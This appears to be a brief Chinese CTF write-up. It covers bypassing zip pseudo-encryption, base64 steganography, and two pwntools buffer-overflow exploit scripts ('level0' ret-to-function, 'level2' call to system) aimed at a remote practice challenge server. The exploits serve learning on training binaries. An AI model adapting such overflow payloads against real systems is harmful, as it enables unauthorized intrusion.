家里断网了也要摸鱼哭唧唧
base64stego
打开zip 发现是有密码的
data:image/s3,"s3://crabby-images/8bd51/8bd511e49282a6452fb6972472653d71633e4163" alt=""
考虑伪加密
data:image/s3,"s3://crabby-images/67867/678670db7f37a735fe2390d14e26e725307bc8cb" alt=""
把这里0900 改成0000
解压成功 打开文件是这样
data:image/s3,"s3://crabby-images/98743/9874381a64bc47d42af76aad30d258020625f58d" alt=""
然后base64隐写了解一下
https://www.tr0y.wang/2017/06/14/Base64steg/
data:image/s3,"s3://crabby-images/a97d3/a97d3ea53bd380957b0cbab366ddc7a454519f5e" alt=""
level0
from pwn import *
sh=remote('111.198.29.45',30231)
p='a'*0x80+'aaaaaaaa'
p+=p64(0x40059A)
sh.send(p)
sh.interactive()
level2
from pwn import *
sh=remote('111.198.29.45', 30233)
p='a'*0x88+'aaaa'
p+=p32(0x08048320)+'aaaa'+p32(0x0804a024)
sh.send(p)
sh.interactive()
截图截不起了f**k
就这样 溜了溜了
网友评论